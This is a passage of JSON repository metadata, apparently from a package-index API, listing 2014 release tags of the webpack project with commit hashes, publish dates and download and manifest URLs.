tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url"